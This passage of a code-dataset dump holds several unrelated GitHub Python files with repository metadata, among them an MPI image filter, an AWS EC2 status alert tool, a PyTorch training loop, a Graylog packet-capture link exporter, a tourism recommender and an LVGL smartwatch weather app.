0\r\n\r\n# Load original image from file\r\nfor line in lines:\r\n # Skip over first 4 lines in file\r\n if line_count > 3:\r\n pixel_values = line.split()\r\n for value in pixel_values:\r\n pixel_values_1d.append(int(value))\r\n else:\r\n line_count += 1\r\n\r\nf.close()\r\n\r\n# Convert 1D array to 256 x 256 2D array\r\noriginal_image = np.reshape(pixel_values_1d, (256,256))\r\n\r\n# Rank 16 will be responsible for reconstructing and writing to the PGM filtered file\r\nif rank == 16:\r\n\r\n pixels = 256 * 256\r\n pixels_filtered = 0\r\n\r\n filtered_image = np.zeros((256, 256))\r\n\r\n # Well send a 3 item array, [pixel_x_coor, pixel_y_coor, pixel_filtered_value], and add it to the filtered array.\r\n while (pixels_filtered < pixels):\r\n req = comm.irecv(source=MPI.ANY_SOURCE)\r\n pixel_filtered_info = req.wait()\r\n filtered_image[pixel_filtered_info[1], pixel_filtered_info[0]] = pixel_filtered_info[2]\r\n pixels_filtered += 1\r\n\r\n printr(str(pixels_filtered) + \"/65536\")\r\n\r\n # Writing an output file\r\n # This will be the end of our program.\r\n f = open(\"output.pgm\", \"w\")\r\n\r\n printr(\"OUTPUTTING: \")\r\n line = \"P2 \" + \"\\n\" + \"256 256 \" + \"\\n\" + \"255\" + \"\\n\"\r\n\r\n max_number = 0\r\n for j in range(256):\r\n for i in range(256):\r\n \r\n if max_number > 16:\r\n line += \"\\n\"\r\n max_number = 0\r\n\r\n if (max_number != 0):\r\n line += \" \"\r\n\r\n line += str(int(filtered_image[j][i]))\r\n\r\n max_number += 1\r\n\r\n line += \"\\n\"\r\n f.write(line)\r\n f.close()\r\n\r\n# Rank 17 will be the controller process\r\nelif rank == 17: \r\n\r\n while(order_idx != 4):\r\n\r\n # Start by setting each process type\r\n for curr_rank in range (16):\r\n if curr_rank in order_arr[order_idx]:\r\n printr(\"Setting \" + str(curr_rank) + \" to Filter\", True)\r\n req = comm.isend(\"Filter\", dest=curr_rank)\r\n req.wait()\r\n\r\n else:\r\n printr(\"Setting \" + str(curr_rank) + \" to Provide\", True)\r\n req = comm.isend(\"Provide\", dest=curr_rank)\r\n req.wait()\r\n\r\n\r\n done = 0\r\n done_arr = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]\r\n\r\n printr(\"Will now wait for every Subimage to finish this layer\", True)\r\n\r\n # When all kernels are done providing / filtering, we move to the next order\r\n while done != 16:\r\n for curr_rank, is_done in enumerate(done_arr):\r\n if is_done != 1:\r\n printr(\"Waiting on rank: \" + str(curr_rank), True)\r\n req = comm.irecv(source=curr_rank)\r\n req.wait()\r\n\r\n done_arr[curr_rank] = 1\r\n done += 1\r\n printr(str(done) + \" subimages finished in order layer: \" + str(order_idx), True)\r\n\r\n order_idx += 1\r\n\r\nelse:\r\n while (order_idx != 4):\r\n\r\n req = comm.irecv(source=17)\r\n filter_or_provide = req.wait()\r\n\r\n # Get offsets for where they are in array\r\n # So sub image 5 will have offset x = 63 offset y = 63 for example\r\n offset_x = rank % 4 * 64\r\n offset_y = int(rank / 4) * 64\r\n\r\n if (offset_x > 0):\r\n offset_x - 1\r\n if (offset_y > 0):\r\n offset_y - 1\r\n\r\n if (filter_or_provide == \"Filter\"):\r\n\r\n printr(\"Currently Filtering!\", True)\r\n for j in range(64):\r\n for i in range (64):\r\n x = i + offset_x\r\n y = j + offset_y\r\n\r\n # Send rank 16 the filtered pixel\r\n filtered_pixel_value = filter_pixel(x, y, offset_x, offset_y, offset_x + 64, offset_y + 64)\r\n\r\n printr(\"Sending pixel value: \" + str(filtered_pixel_value)+ \" to 16 (Constructor)\")\r\n\r\n req = comm.isend([x, y, filtered_pixel_value], dest=16)\r\n req.wait()\r\n \r\n # Tell our neighbor processes that were done filtering\r\n for neighbor in rank_neighbors[rank]:\r\n req = comm.isend(1, dest=neighbor)\r\n req.wait()\r\n\r\n # Tell controller were done filtering this sub image\r\n printr(\"Done filtering!\", True)\r\n req = comm.isend(True, dest=17)\r\n req.wait()\r\n\r\n\r\n else:\r\n\r\n printr(\"Currently Providing!\", True)\r\n neighbors_that_need_this_provider = 0\r\n neighbor_done_count = 0\r\n neighbors_in_order = []\r\n\r\n\r\n # Each provider process needs to know how many \"done\"\r\n # messages it needs to receive.\r\n for neighbor in rank_neighbors[rank]:\r\n if neighbor in order_arr[order_idx]:\r\n neighbors_that_need_this_provider += 1\r\n neighbors_in_order.append(neighbor)\r\n\r\n while neighbor_done_count != neighbors_that_need_this_provider:\r\n for neighbor in neighbors_in_order:\r\n\r\n printr(\"Waiting on neighbor: \" + str(neighbor))\r\n if comm.Iprobe(source=neighbor):\r\n req = comm.irecv(source=neighbor)\r\n data = req.wait()\r\n\r\n # We wait to receive data from filtering neighbor.\r\n # If we recieve a done message, we just increment the done count,\r\n # else we provide them with the requested pixel value\r\n if data == 1:\r\n neighbor_done_count += 1\r\n else:\r\n req = comm.isend(original_image[data[0], data[1]], dest=neighbor)\r\n req.wait()\r\n \r\n # Tell controller were done providing\r\n printr(\"Done Providing!\", True)\r\n req = comm.isend(True, dest=17)\r\n req.wait()\r\n\r\n \r\n # Keep track of what layer we are in each individual process\r\n order_idx += 1\r\n \r\n","repo_name":"Jtboone1/Concurrent_A4","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":11192,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"9795097820","text":"import os\nimport os.path\n\nfrom boto3.session import Session\nimport click\nimport toml\n\nimport notify\n\n\ndef get_profiles(config):\n if 'aws_profiles' not in config:\n return {\n 'default': Session()\n }\n\n return {\n prof: Session(profile_name=prof)\n for prof in config['aws_profiles']\n }\n\n\n# TODO: truly support instance-status, system-status.\ndef get_instance_statuses(ec2_client, config):\n def _filter(filters):\n _statuses = []\n next_token = ''\n\n while True:\n res = ec2_client.describe_instance_status(\n Filters=[\n {'Name': k, 'Values': v}\n for k, v in filters.iteritems()\n ],\n NextToken=next_token,\n MaxResults=1000\n )\n\n # We don't care about completed events. Thanks amazon for this\n # wonderful API.\n active_events = [\n status\n for status in res['InstanceStatuses']\n for event in status.get('Events', [])\n if not event['Description'].startswith('[Completed]')\n ]\n\n # Don't alert if we don't have any active events\n if len(active_events):\n _statuses.extend(active_events)\n next_token = res.get('NextToken')\n\n if not next_token:\n break\n\n return _statuses\n\n # describe_instance_status is an AND of filters, we want an OR\n seen = set()\n results = [\n _filter({'event.code': ['*']}),\n _filter({'instance-status.status': ['impaired']}),\n _filter({'instance-status.reachability': ['failed']}),\n _filter({'system-status.status': ['impaired']}),\n _filter({'system-status.reachability': ['failed']}),\n ]\n\n statuses = []\n for instances in results:\n statuses.extend([i for i in instances if i['InstanceId'] not in seen])\n seen.update([i['InstanceId'] for i in instances])\n\n return statuses\n\n\ndef get_config(config_locations):\n for loc in config_locations:\n file_name = os.path.expanduser(loc)\n\n if os.path.exists(file_name):\n click.echo('using config %s' % file_name, err=True)\n\n with open(file_name) as fp:\n return toml.loads(fp.read())\n\n\n@click.command()\n@click.option('--dry-run', is_flag=True, help='Disables sending alerts')\n@click.option('--config', required=False, help='Configuration file location')\n@click.option('--quiet', '-q', is_flag=True, help='Disables default JSON output')\ndef main(dry_run, config, quiet):\n config_names = [config] if config else ['pension.toml', '~/.pension.toml']\n\n try:\n config = get_config(config_names)\n except:\n click.echo('Failed to parse config', err=True)\n return -1\n\n if config is None:\n click.echo('No usable config file, trying environment vars', err=True)\n config = {'notify': {'json': {}}}\n\n data = {'instances': [], 'profiles': {}}\n instance_map = {}\n\n for prof, session in get_profiles(config).iteritems():\n ec2_client = session.client('ec2')\n ec2 = session.resource('ec2')\n\n statuses = get_instance_statuses(ec2_client, config)\n\n data['profiles'][prof] = {\n 'region': session._session.get_config_variable('region'),\n 'instances': [s['InstanceId'] for s in statuses]\n }\n data['instances'].extend(statuses)\n\n if statuses:\n # Keep track of boto ec2 instances\n instance_list = ec2.instances.filter(InstanceIds=[\n s['InstanceId'] for s in statuses\n ])\n\n instance_map.update({\n i.instance_id: i\n for i in instance_list\n })\n\n click.echo('%d instance(s) have reported issues' % len(data['instances']),\n err=True)\n\n if dry_run:\n config['notify'] = {} if quiet else {'json': {}}\n\n notify.send(data, instance_map, config['notify'])\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"erik/pension","sub_path":"pension/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":4059,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"37"} +{"seq_id":"3215231456","text":"import torch\nfrom tqdm import tqdm\n\nfrom share_funcs import get_model, get_loaders, get_criterion, get_optimizer\n\n\ndef train(model, data_loader, criterion, optimizer, device, grad_acc=1):\n model.train()\n\n # zero the parameter gradients\n optimizer.zero_grad()\n\n total_loss = 0.\n for i, (inputs, labels) in tqdm(enumerate(data_loader), total=len(data_loader)):\n inputs = inputs.to(device)\n labels = labels.to(device)\n\n outputs = model(inputs)\n\n loss = criterion(outputs, labels)\n loss.backward()\n\n # Gradient accumulation\n if (i % grad_acc) == 0:\n optimizer.step()\n optimizer.zero_grad()\n\n total_loss += loss.item()\n\n total_loss /= len(data_loader)\n metrics = {'train_loss': total_loss}\n return metrics\n\n\ndef eval(model, data_loader, criterion, device):\n model.eval()\n num_correct = 0.\n\n with torch.no_grad():\n total_loss = 0.\n for inputs, labels in tqdm(data_loader, total=len(data_loader)):\n inputs = inputs.to(device)\n labels = labels.to(device)\n\n outputs = model(inputs)\n _, preds = torch.max(outputs, 1)\n\n loss = criterion(outputs, labels)\n\n total_loss += loss.item()\n num_correct += torch.sum(preds == labels.data)\n\n total_loss /= len(data_loader)\n num_correct /= len(data_loader.dataset)\n metrics = {'valid_loss': total_loss, 'val_acc': num_correct}\n return metrics\n\n\ndef main():\n epochs = 10\n\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n model = get_model()\n train_loader, val_loader = get_loaders()\n optimizer, lr_scheduler = get_optimizer(model=model)\n criterion = get_criterion()\n\n # Model を multi-gpu したり、FP16 対応したりする\n model = model.to(device)\n\n print('Train start !')\n for epoch in range(epochs):\n print(f'epoch {epoch} start !')\n metrics_train = train(model, train_loader, criterion, optimizer, device)\n metrics_eval = eval(model, val_loader, criterion, device)\n\n lr_scheduler.step()\n\n # Logger 周りの処理\n # print するためのごちゃごちゃした処理\n print(f'epoch: {epoch} ', metrics_train, metrics_eval)\n\n # tqdm 使ってたらさらにごちゃごちゃする処理をここに書く\n # Model を保存するための処理\n # Multi-GPU の場合さらに注意して書く\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"yukkyo/Compare-PyTorch-Catalyst-Ignite-Lightning","sub_path":"train_default.py","file_name":"train_default.py","file_ext":"py","file_size_in_byte":2523,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"37"} +{"seq_id":"15198713332","text":"import re\r\nimport config\r\nimport commands\r\nimport json\r\nimport csv\r\n\r\n# Manual Configuration\r\ngraylog_host = config.graylog_hostname\r\ntoken = config.graylog_token\r\nstream_id = config.graylog_stream\r\ntemp_from_date = config.from_date \t\t# If Manual Time Frame Selection in config\r\ntemp_to_date = config.to_date # If Manual Time Frame Selection in config\r\n# End of Manual Configuration\r\n\r\ndef graylog_export(): \r\n\tpkt_capture= []\r\n\t# auto_config_timeframe = config.cron_config()\t# If Automated Time Frame Selection in config\r\n\t# temp_from_date = auto_config_timeframe[0]\t\t# If Automated Time Frame Selection in config\r\n\t# temp_to_date = auto_config_timeframe[1]\t\t# If Automated Time Frame Selection in config\r\n\r\n\tfrom_regex = re.search('(.*)[\\s]+(\\d\\d):(\\d\\d):(\\d\\d)',temp_from_date)\r\n\tfrom_date = from_regex.groups()[0]\r\n\tfrom_hour = from_regex.groups()[1]\r\n\tfrom_mins = from_regex.groups()[2]\r\n\tfrom_secs = from_regex.groups()[3]\r\n\tto_regex = re.search('(.*)[\\s]+(\\d\\d):(\\d\\d):(\\d\\d)',temp_to_date)\r\n\tto_date = to_regex.groups()[0]\r\n\tto_hour = to_regex.groups()[1]\r\n\tto_mins = to_regex.groups()[2]\r\n\tto_secs = to_regex.groups()[3]\r\n\r\n\turl = \"https://{}:9000/api/search/universal/absolute?query=device_vendor%3AMcAfee%20AND%20streams%3A{}&from={}%20{}%3A{}%3A{}&to={}%20{}%3A{}%3A{}&fields=Packet_Capture_Link_RT\".format(graylog_host,stream_id,from_date,from_hour,from_mins,from_secs,to_date,to_hour,to_mins,to_secs)\r\n\tcurlCmd = \"curl -k -u %s:token -X GET '%s' > packet_capture.csv\" %(token,url)\r\n\toutput = commands.getoutput(curlCmd)\r\n\t\r\n\twith open('packet_capture.csv', 'rb') as csvfile:\r\n\t\treader = csv.reader(csvfile, delimiter=',', quotechar='\"')\r\n\t\treader.next()\r\n\t\tfor row in reader:\r\n\t\t\tpkt_capture.append(row[1])\r\n\t\r\n\treturn list(pkt_capture)\r\n\t\t\r\n\r\nif __name__ == '__main__':\r\n func = graylog_export()","repo_name":"naren-jayram/McAfee-IDS-PCAP-Exporter","sub_path":"graylog_pcap_link_exporter.py","file_name":"graylog_pcap_link_exporter.py","file_ext":"py","file_size_in_byte":1821,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"34994990988","text":"MAPPING_TYPE = 'Mapping'\nSAME_AS = 'SAME-AS'\n\nMAPPING_WAS_RETIRED = 'Mapping was retired'\nMAPPING_WAS_UNRETIRED = 'Mapping was un-retired'\nMAPPING_IS_ALREADY_RETIRED = 'Mapping is already retired'\nMAPPING_IS_ALREADY_NOT_RETIRED = 'Mapping is already not retired'\nPERSIST_CLONE_ERROR = 'An error occurred while saving new concept version.'\nPARENT_VERSION_NOT_LATEST_CANNOT_UPDATE_MAPPING = 'Parent version is not the latest. Cannot update mapping.'\nPERSIST_CLONE_SPECIFY_USER_ERROR = \"Must specify which user is attempting to create a new mapping version.\"\nOPENMRS_SINGLE_MAPPING_BETWEEN_TWO_CONCEPTS = 'There can be only one mapping between two concepts'\nOPENMRS_INVALID_MAPTYPE = 'Invalid mapping type'\nOPENMRS_EXTERNAL_ID_LENGTH = 36\nOPENMRS_MAPPING_EXTERNAL_ID_ERROR = f'Mapping External ID cannot be more than {OPENMRS_EXTERNAL_ID_LENGTH} characters.'\nMUST_SPECIFY_FROM_CONCEPT = \"Must specify a 'from_concept'.\"\nMUST_SPECIFY_TO_CONCEPT_OR_TO_SOURCE = \"Must specify either 'to_concept_url' or 'to_source_url' & 'to_concept_code'.\"\nTO_SOURCE_UNIQUE_ATTRIBUTES_ERROR_MESSAGE = \"Parent, map_type, from_concept, to_source, to_concept_code must be unique.\"\nALREADY_EXISTS = \"Mapping ID must be unique within a source.\"\n","repo_name":"OpenConceptLab/oclapi2","sub_path":"core/mappings/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":1218,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"37"} +{"seq_id":"30496078969","text":"class Solution(object):\r\n def intToRoman(self, num):\r\n \"\"\"\r\n :type num: int\r\n :rtype: str\r\n \"\"\"\r\n origin_num = num # original number\r\n \r\n element_num = [1, 4, 5, 9, 10, 40, 50, 90, 100, 400, 500, 900, 1000]\r\n element_sym = [\"I\", \"IV\", \"V\", \"IX\", \"X\", \"XL\", \"L\", \"XC\", \"C\", \"CD\", \r\n \"D\", \"CM\", \"M\"]\r\n assert len(element_num) == len(element_sym)\r\n # list of symbol and value\r\n sv_list = [(sym, num) for sym, num in zip(element_sym, element_num)]\r\n vs_list = [(num, sym) for sym, num in zip(element_sym, element_num)]\r\n # build two-way dictionary\r\n sym2val = dict(sv_list)\r\n val2sym = dict(vs_list)\r\n\r\n element_cnt = {i: 0 for i in element_num}\r\n # stack is the copy of element_num\r\n stack = [i for i in element_num]\r\n \r\n num = origin_num # assign origin_num back to num\r\n while num > 0:\r\n top = stack[-1]\r\n if num >= top:\r\n num -= top\r\n element_cnt[top] += 1\r\n else:\r\n stack.pop()\r\n \r\n ret = \"\"\r\n for num, sym in zip(element_num[::-1], element_sym[::-1]):\r\n ret += sym * element_cnt[num]\r\n \r\n return ret","repo_name":"ycchhueannu/LeetCode","sub_path":"python/0012_Integer_to_Roman.py","file_name":"0012_Integer_to_Roman.py","file_ext":"py","file_size_in_byte":1296,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"7017239798","text":"import numpy as np\r\nimport pandas as pd\r\nimport csv\r\nimport matplotlib.pyplot as plt\r\n\r\nimport seaborn as sns\r\nimport plotly.express as px\r\n\r\nfrom sklearn.feature_extraction.text import TfidfVectorizer\r\nfrom Sastrawi.Stemmer.StemmerFactory import StemmerFactory\r\nfrom Sastrawi.StopWordRemover.StopWordRemoverFactory import StopWordRemoverFactory\r\nfrom sklearn.metrics.pairwise import cosine_similarity\r\n\r\nfrom zipfile import ZipFile\r\nimport tensorflow as tf\r\nfrom tensorflow import keras\r\nfrom tensorflow.keras import layers\r\nfrom pathlib import Path\r\n\r\ntv = TfidfVectorizer(max_features=5000)\r\nstem = StemmerFactory().create_stemmer()\r\nstopword = StopWordRemoverFactory().create_stop_word_remover()\r\n\r\ndata_tourism_rating = pd.read_csv('tourism_rating.csv')\r\ndata_tourism_with_id = pd.read_csv('tourism_with_id.csv')\r\ndata_user = pd.read_csv('user.csv')\r\n\r\nprint(data_tourism_rating.head())\r\nprint(data_tourism_with_id.head())\r\nprint(data_user.head())\r\n\r\ndata_tourism_with_id.drop(['Rating','Time_Minutes','Coordinate','Lat','Long','Unnamed: 11','Unnamed: 12'],axis=1,inplace=True)\r\n\r\nprint(\"-----\")\r\nprint(data_tourism_with_id)\r\n\r\ndata_rekomendasi = pd.merge(data_tourism_rating.groupby('Place_Id')['Place_Ratings'].mean(),data_tourism_with_id,on='Place_Id')\r\nprint(\"------\")\r\nprint(data_rekomendasi)\r\n\r\ndef preprocessing(data):\r\n data = data.lower()\r\n data = stem.stem(data)\r\n data = stopword.remove(data)\r\n return data\r\n\r\ndata_content_based_filtering = data_rekomendasi.copy()\r\ndata_content_based_filtering['Tags'] = data_content_based_filtering['Description'] + ' ' + data_content_based_filtering['Category']\r\ndata_content_based_filtering.drop(['Price','Place_Ratings','Description','Category'],axis=1,inplace=True)\r\nprint(\"----\")\r\nprint(\"Data Filltering\")\r\nprint(data_content_based_filtering)\r\n\r\ndata_content_based_filtering.Tags = data_content_based_filtering.Tags.apply(preprocessing)\r\nprint(\"----\")\r\nprint(data_content_based_filtering)\r\n\r\nvectors = tv.fit_transform(data_content_based_filtering.Tags).toarray()\r\nprint(\"-----\")\r\nprint(\"Vectors\")\r\nprint(vectors)\r\n\r\nsimilarity = cosine_similarity(vectors)\r\nsimilarity[0][1:10]\r\nprint(\"----\")\r\nprint(\"Similarity\")\r\nprint(similarity)\r\n\r\ndef recommend_by_content_based_filtering(nama_tempat):\r\n nama_tempat_index = data_content_based_filtering[data_content_based_filtering['City']==nama_tempat].index[0]\r\n distancess = similarity[nama_tempat_index]\r\n nama_tempat_list = sorted(list(enumerate(distancess)),key=lambda x: x[1],reverse=True)[1:20]\r\n \r\n recommended_nama_tempats = []\r\n for i in nama_tempat_list:\r\n recommended_nama_tempats.append(([data_content_based_filtering.iloc[i[0]].Place_Name]+[i[1]]))\r\n \r\n return recommended_nama_tempats\r\nprint(\"----\")\r\nprint(\"Berikut Hasil Rekomendasi :\")\r\nprint(\"^^\")\r\nprint(recommend_by_content_based_filtering('Jakarta'))\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"simple1809/rekomendasi","sub_path":"parwis.py","file_name":"parwis.py","file_ext":"py","file_size_in_byte":2876,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18894751967","text":"import nltk\nfrom urllib import urlopen\n#https://stackoverflow.com/questions/328356/extracting-text-from-html-file-using-python\n#I could do a loop for a url list example https://stackoverflow.com/questions/18952351/scrape-html-files-stored-in-remote-directory\nurl = \"http://www.lens.org/lens/patent/US_7469381_B2/fulltext\"\n#do a partition hear to create the file name\nhtml = urlopen(url).read()\nnewfile = open('US_7469381_B2_fulltext.html','w') #YAY! saving it as an html file works like a charm motha fucka!\nnewfile.write(html)\n\n\nraw = nltk.clean_html(html) #this code processes the file into text the rest of the code can read. It will need to be in the other files.\nprint(raw)\n\n\n#shit this is super clean\n\n","repo_name":"rcmckee/InvalidPatents","sub_path":"_downloadhtml.py","file_name":"_downloadhtml.py","file_ext":"py","file_size_in_byte":709,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"22987818308","text":"import ujson as json\nimport lvgl as lv\nfrom lv_colors import lv_colors\n\nMAX_METAWEATHER_ICON = 10\nMAX_DAY = 5\ntry:\n import urequests\nexcept:\n pass\n\nclass WeatherApp():\n \n def __init__(self,mainbar):\n try:\n import ulogging as logging\n except:\n import logging\n self.log = logging.getLogger(\"WeatherApp\")\n self.log.setLevel(logging.DEBUG) \n self.day_index = 0\n self.woeid=\"784794\" #woeid for Zürich\n self.lat = \"47.52637\"\n self.lon = \"9.74882\"\n\n self.retrieved = False\n self.date = []\n self.weather_state_abbr = []\n self.weather_state_name = []\n self.min_temp = []\n self.max_temp = []\n self.humid = []\n self.predic = []\n self.wind_speed = []\n self.wind_direction = []\n self.air_pressure = []\n self.loc = \"\"\n self.time = \"\"\n self.icon_data=[None]*MAX_METAWEATHER_ICON\n self.icon_dsc=[None]*MAX_METAWEATHER_ICON\n self.icon_filename={'c':'c_64px',\n 'h':'h_64px',\n 'hc':'hc_64px',\n 'hr':'hr_64px',\n 'lc':'lc_64px',\n 'lr':'lr_64px',\n 's':'s_64px',\n 'sl':'sl_64px',\n 'sn':'sn_64px',\n 't':'t_64px'}\n\n self.mainbar=mainbar\n self.statusbar=mainbar.gui.statusbar\n self.app = mainbar.app\n \n self.tile_num = mainbar.add_app_tile( 1, 1, \"weather app\" )\n self.log.debug(\"tile number for main tile: %d\",self.tile_num)\n \n self.log.debug(\"registering weather app\")\n app=self.app.register(\"weather\",\"lc_64px\",self.enter_weather_app_event_cb)\n \n try:\n self.get_forecast()\n self.log.info(\"Reading weather forecast from metaweather.com\")\n except:\n self.log.info(\"Reading weather forecast from file metaweather.json\")\n self.read_forecast_from_file()\n\n #\n # create the icons\n #\n keys = list(self.icon_filename.keys())\n for key in keys:\n self.log.debug(\"Key: %s\"%key)\n index = keys.index(key)\n (self.icon_data[index],self.icon_dsc[index]) = self.get_icon(self.icon_filename[key])\n self.main_page(self.tile_num)\n self.widget = mainbar.gui.widget\n self.add_widget()\n \n def get_forecast(self):\n url = \"https://www.metaweather.com/api/location/%s/\"%self.woeid\n response = urequests.get(url)\n if response.status_code == 200: # query successful\n # write response to file for testing\n # print(response.text)\n # parse JSON\n data = response.json()\n # print(data)\n response.close()\n # dump the data to a file\n with open('json/metaweather.json', 'w') as json_file:\n json.dump(data, json_file)\n self.decode(data)\n else:\n self.log.error(\"Query failed, error code was: %d\"%response.status_code)\n\n def decode(self,data):\n self.loc = (data[\"title\"])[:18]\n self.time = data[\"time\"]\n for i in range(MAX_DAY+1):\n w_data = data[\"consolidated_weather\"][i]\n self.date.append(w_data[\"applicable_date\"])\n self.weather_state_name.append(w_data[\"weather_state_name\"])\n self.min_temp.append(float(w_data[\"min_temp\"]))\n self.max_temp.append(float(w_data[\"max_temp\"]))\n self.humid.append(int(w_data[\"humidity\"]))\n self.predic.append(int(w_data[\"predictability\"]))\n self.wind_direction.append(w_data[\"wind_direction_compass\"])\n self.air_pressure.append(w_data[\"air_pressure\"])\n self.weather_state_abbr.append(w_data[\"weather_state_abbr\"])\n self.wind_speed.append(w_data[\"wind_speed\"]*1.609) # convert to kph\n self.location = data[\"title\"]\n self.log.debug(\"Location: %s\"%self.location)\n \n def print_weather_info(self):\n for i in range(MAX_DAY+1):\n output_str = \"Date: {0} [{1}%], State: {2}, Temp: {3}/{4} *C, Humid: {5}\\n State Abbreviation: {6} Airpressure: {7}, Wind direction: {8}\"\n self.log.debug(output_str.format(self.date[i], self.predic[i], self.weather_state_name[i], self.max_temp[i], self.min_temp[i],\n self.humid[i], self.weather_state_abbr[i], self.air_pressure[i],self.wind_direction[i]))\n \n def read_forecast_from_file(self):\n with open('json/metaweather.json') as f:\n data = json.load(f)\n self.decode(data)\n\n def get_icon(self,filename):\n\n try:\n sdl_filename = 'images/' + filename + \"_argb8888.bin\"\n self.log.debug('sdl filename: ' + sdl_filename)\n with open(sdl_filename,'rb') as f:\n app_icon_data = f.read()\n self.log.debug(sdl_filename + \" successfully read\")\n except:\n twatch_filename = 'images/' + filename + \"_argb565.bin\"\n self.log.debug('t-watch filename: ' + twatch_filename)\n try:\n with open(twatch_filename,'rb') as f:\n app_icon_data = f.read()\n self.log.debug(twatch_filename + \" successfully read\")\n \n except:\n self.log.error(\"Could not find image file: \" + filename) \n\n icon_dsc = lv.img_dsc_t(\n {\n \"header\": {\"always_zero\": 0, \"w\": 64, \"h\": 64, \"cf\": lv.img.CF.TRUE_COLOR_ALPHA},\n \"data\": app_icon_data,\n \"data_size\": len(app_icon_data),\n }\n )\n return (app_icon_data,icon_dsc)\n\n def main_page(self,tile_num):\n # create the GUI\n self.weather_app_tile = self.mainbar.get_tile_obj(tile_num);\n weather_style = lv.style_t()\n weather_style.copy(self.mainbar.get_style())\n \n weather_cont = lv.obj(self.weather_app_tile,None)\n weather_cont.set_size(lv.scr_act().get_disp().driver.hor_res,30)\n weather_cont.add_style(lv.cont.PART.MAIN,weather_style)\n \n # create date label and left right buttons\n btn_style = lv.style_t()\n btn_style.copy(weather_style)\n btn_style.set_radius(lv.btn.STATE.RELEASED,2)\n self.left_button = lv.btn(weather_cont,None)\n self.left_button.set_size(25,25)\n self.left_button.add_style(lv.btn.PART.MAIN,btn_style)\n left_label = lv.label(self.left_button,None)\n left_label.set_text(lv.SYMBOL.LEFT)\n self.left_button.align(weather_cont,lv.ALIGN.IN_LEFT_MID,5,0)\n self.left_button.set_hidden(True)\n self.left_button.set_event_cb(self.decrement_day)\n \n self.date_label = lv.label(weather_cont,None)\n self.date_label.set_text(self.date[self.day_index])\n self.date_label.align(weather_cont,lv.ALIGN.CENTER,0,0)\n \n self.right_button = lv.btn(weather_cont,None)\n self.right_button.set_size(25,25)\n self.right_button.add_style(lv.btn.PART.MAIN,btn_style)\n right_label = lv.label(self.right_button,None)\n right_label.set_text(lv.SYMBOL.RIGHT)\n self.right_button.align(weather_cont,lv.ALIGN.IN_RIGHT_MID,-5,0)\n self.right_button.set_event_cb(self.increment_day)\n\n icon_cont_style = lv.style_t()\n icon_cont_style.copy(weather_style)\n icon_cont_style.set_bg_opa(lv.obj.PART.MAIN, lv.OPA.TRANSP)\n\n icon_cont = lv.cont(self.weather_app_tile,None)\n icon_cont.set_layout(lv.LAYOUT.COLUMN_LEFT)\n icon_cont.add_style(lv.cont.PART.MAIN,icon_cont_style)\n icon_cont.set_fit(lv.FIT.TIGHT)\n\n self.icon = lv.img(icon_cont,None)\n key_list = list(self.icon_filename.keys())\n self.log.debug(key_list)\n index = key_list.index(self.weather_state_abbr[self.day_index])\n self.log.debug(\"index of %s: %d\"%(self.weather_state_abbr[self.day_index],index))\n self.icon.set_src(self.icon_dsc[index])\n icon_cont.align(weather_cont,lv.ALIGN.OUT_BOTTOM_LEFT,0,0)\n self.state_label = lv.label(icon_cont,None)\n self.state_label.set_width(100)\n self.state_label.set_text(self.weather_state_name[self.day_index])\n \n info_cont_style = lv.style_t()\n info_cont_style.copy(weather_style)\n info_cont_style.set_pad_top(lv.STATE.DEFAULT,6)\n info_cont_style.set_pad_inner(lv.STATE.DEFAULT,4)\n \n info_cont = lv.cont(self.weather_app_tile,None)\n info_cont.set_size(lv.scr_act().get_disp().driver.hor_res,90)\n info_cont.set_layout(lv.LAYOUT.COLUMN_LEFT)\n info_cont.add_style(lv.cont.PART.MAIN,icon_cont_style)\n info_cont.set_fit(lv.FIT.NONE)\n info_cont.align(icon_cont,lv.ALIGN.OUT_BOTTOM_LEFT,0,0)\n info_cont.add_style(lv.cont.PART.MAIN,info_cont_style)\n \n self.confidence_label = lv.label(info_cont,None)\n self.confidence_label.set_text(\"Confidence level: {}%\".format(self.predic[self.day_index]))\n self.temp_label = lv.label(info_cont,None)\n self.temp_label.set_text(\"Temp: min: %3.1f°C, max: %3.1f°C\"%(self.min_temp[self.day_index],self.max_temp[self.day_index]))\n self.humidity_label = lv.label(info_cont,None)\n self.humidity_label.set_text(\"Humidity: {}%\".format(self.humid[self.day_index]))\n self.pressure_label = lv.label(info_cont,None)\n self.pressure_label.set_text(\"Air pressure: %d hPa\"%self.air_pressure[self.day_index])\n\n info_cont2 = lv.cont(self.weather_app_tile,None)\n # info_cont2.set_size(140,120)\n info_cont2.set_layout(lv.LAYOUT.COLUMN_LEFT)\n info_cont2.add_style(lv.cont.PART.MAIN,icon_cont_style)\n info_cont2.set_fit(lv.FIT.TIGHT)\n info_cont2.align(icon_cont,lv.ALIGN.OUT_RIGHT_TOP,-5,0)\n info_cont2.add_style(lv.cont.PART.MAIN,info_cont_style)\n\n self.location_label = lv.label(info_cont2,None)\n self.location_label.set_text(\"Location: \"+self.location)\n self.wind_label = lv.label(info_cont2,None)\n self.wind_label.set_text(\"Wind:\\nspeed: %5.1f kph\\ndir: %s\"%(self.wind_speed[self.day_index],\n self.wind_direction[self.day_index]))\n\n exit_btn = lv.imgbtn(self.weather_app_tile,None)\n exit_btn.set_src(lv.btn.STATE.RELEASED,self.mainbar.get_exit_btn_dsc())\n 